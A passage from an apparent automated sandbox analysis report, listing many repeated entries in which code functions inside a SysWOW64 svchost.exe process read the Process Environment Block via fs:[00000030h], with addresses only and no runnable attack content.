            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F92A6 mov eax, dword ptr fs:[00000030h]9_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F92A6 mov eax, dword ptr fs:[00000030h]9_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F92A6 mov eax, dword ptr fs:[00000030h]9_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F92A6 mov eax, dword ptr fs:[00000030h]9_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov ecx, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C72A0 mov eax, dword ptr fs:[00000030h]9_2_036C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C72A0 mov eax, dword ptr fs:[00000030h]9_2_036C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B92BC mov eax, dword ptr fs:[00000030h]9_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B92BC mov eax, dword ptr fs:[00000030h]9_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B92BC mov ecx, dword ptr fs:[00000030h]9_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B92BC mov ecx, dword ptr fs:[00000030h]9_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h]9_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h]9_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h]9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h]9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h]9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03705283 mov eax, dword ptr fs:[00000030h]9_2_03705283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366329E mov eax, dword ptr fs:[00000030h]9_2_0366329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366329E mov eax, dword ptr fs:[00000030h]9_2_0366329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C9179 mov eax, dword ptr fs:[00000030h]9_2_036C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03705152 mov eax, dword ptr fs:[00000030h]9_2_03705152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov ecx, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629148 mov eax, dword ptr fs:[00000030h]9_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629148 mov eax, dword ptr fs:[00000030h]9_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629148 mov eax, dword ptr fs:[00000030h]9_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629148 mov eax, dword ptr fs:[00000030h]9_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03637152 mov eax, dword ptr fs:[00000030h]9_2_03637152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C156 mov eax, dword ptr fs:[00000030h]9_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636154 mov eax, dword ptr fs:[00000030h]9_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636154 mov eax, dword ptr fs:[00000030h]9_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03660124 mov eax, dword ptr fs:[00000030h]9_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03631131 mov eax, dword ptr fs:[00000030h]9_2_03631131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03631131 mov eax, dword ptr fs:[00000030h]9_2_03631131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B136 mov eax, dword ptr fs:[00000030h]9_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B136 mov eax, dword ptr fs:[00000030h]9_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B136 mov eax, dword ptr fs:[00000030h]9_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B136 mov eax, dword ptr fs:[00000030h]9_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov ecx, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F0115 mov eax, dword ptr fs:[00000030h]9_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036351ED mov eax, dword ptr fs:[00000030h]9_2_036351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037061E5 mov eax, dword ptr fs:[00000030h]9_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036601F8 mov eax, dword ptr fs:[00000030h]9_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h]9_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h]9_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366D1D0 mov eax, dword ptr fs:[00000030h]9_2_0366D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]9_2_0366D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037051CB mov eax, dword ptr fs:[00000030h]9_2_037051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E11A4 mov eax, dword ptr fs:[00000030h]9_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E11A4 mov eax, dword ptr fs:[00000030h]9_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E11A4 mov eax, dword ptr fs:[00000030h]9_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E11A4 mov eax, dword ptr fs:[00000030h]9_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364B1B0 mov eax, dword ptr fs:[00000030h]9_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03670185 mov eax, dword ptr fs:[00000030h]9_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h]9_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h]9_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03687190 mov eax, dword ptr fs:[00000030h]9_2_03687190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03705060 mov eax, dword ptr fs:[00000030h]9_2_03705060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov ecx, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365C073 mov eax, dword ptr fs:[00000030h]9_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632050 mov eax, dword ptr fs:[00000030h]9_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D705E mov ebx, dword ptr fs:[00000030h]9_2_036D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D705E mov eax, dword ptr fs:[00000030h]9_2_036D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B052 mov eax, dword ptr fs:[00000030h]9_2_0365B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A020 mov eax, dword ptr fs:[00000030h]9_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C020 mov eax, dword ptr fs:[00000030h]9_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F903E mov eax, dword ptr fs:[00000030h]9_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F903E mov eax, dword ptr fs:[00000030h]9_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F903E mov eax, dword ptr fs:[00000030h]9_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F903E mov eax, dword ptr fs:[00000030h]9_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036550E4 mov eax, dword ptr fs:[00000030h]9_2_036550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036550E4 mov ecx, dword ptr fs:[00000030h]9_2_036550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036380E9 mov eax, dword ptr fs:[00000030h]9_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C0F0 mov eax, dword ptr fs:[00000030h]9_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036720F0 mov ecx, dword ptr fs:[00000030h]9_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov ecx, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov ecx, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov ecx, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov ecx, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037050D9 mov eax, dword ptr fs:[00000030h]9_2_037050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B20DE mov eax, dword ptr fs:[00000030h]9_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036590DB mov eax, dword ptr fs:[00000030h]9_2_036590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F60B8 mov eax, dword ptr fs:[00000030h]9_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F60B8 mov ecx, dword ptr fs:[00000030h]9_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363208A mov eax, dword ptr fs:[00000030h]9_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362D08D mov eax, dword ptr fs:[00000030h]9_2_0362D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03635096 mov eax, dword ptr fs:[00000030h]9_2_03635096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365D090 mov eax, dword ptr fs:[00000030h]9_2_0365D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365D090 mov eax, dword ptr fs:[00000030h]9_2_0365D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366909C mov eax, dword ptr fs:[00000030h]9_2_0366909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B765 mov eax, dword ptr fs:[00000030h]9_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B765 mov eax, dword ptr fs:[00000030h]9_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B765 mov eax, dword ptr fs:[00000030h]9_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B765 mov eax, dword ptr fs:[00000030h]9_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638770 mov eax, dword ptr fs:[00000030h]9_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03643740 mov eax, dword ptr fs:[00000030h]9_2_03643740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03643740 mov eax, dword ptr fs:[00000030h]9_2_03643740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03643740 mov eax, dword ptr fs:[00000030h]9_2_03643740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366674D mov esi, dword ptr fs:[00000030h]9_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366674D mov eax, dword ptr fs:[00000030h]9_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366674D mov eax, dword ptr fs:[00000030h]9_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630750 mov eax, dword ptr fs:[00000030h]9_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672750 mov eax, dword ptr fs:[00000030h]9_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672750 mov eax, dword ptr fs:[00000030h]9_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03703749 mov eax, dword ptr fs:[00000030h]9_2_03703749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B4755 mov eax, dword ptr fs:[00000030h]9_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EF72E mov eax, dword ptr fs:[00000030h]9_2_036EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03633720 mov eax, dword ptr fs:[00000030h]9_2_03633720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364F720 mov eax, dword ptr fs:[00000030h]9_2_0364F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364F720 mov eax, dword ptr fs:[00000030h]9_2_0364F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364F720 mov eax, dword ptr fs:[00000030h]9_2_0364F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F972B mov eax, dword ptr fs:[00000030h]9_2_036F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C720 mov eax, dword ptr fs:[00000030h]9_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C720 mov eax, dword ptr fs:[00000030h]9_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370B73C mov eax, dword ptr fs:[00000030h]9_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370B73C mov eax, dword ptr fs:[00000030h]9_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370B73C mov eax, dword ptr fs:[00000030h]9_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370B73C mov eax, dword ptr fs:[00000030h]9_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629730 mov eax, dword ptr fs:[00000030h]9_2_03629730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629730 mov eax, dword ptr fs:[00000030h]9_2_03629730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03665734 mov eax, dword ptr fs:[00000030h]9_2_03665734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363973A mov eax, dword ptr fs:[00000030h]9_2_0363973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363973A mov eax, dword ptr fs:[00000030h]9_2_0363973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366273C mov eax, dword ptr fs:[00000030h]9_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366273C mov ecx, dword ptr fs:[00000030h]9_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366273C mov eax, dword ptr fs:[00000030h]9_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AC730 mov eax, dword ptr fs:[00000030h]9_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03637703 mov eax, dword ptr fs:[00000030h]9_2_03637703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03635702 mov eax, dword ptr fs:[00000030h]9_2_03635702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03635702 mov eax, dword ptr fs:[00000030h]9_2_03635702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C700 mov eax, dword ptr fs:[00000030h]9_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630710 mov eax, dword ptr fs:[00000030h]9_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03660710 mov eax, dword ptr fs:[00000030h]9_2_03660710
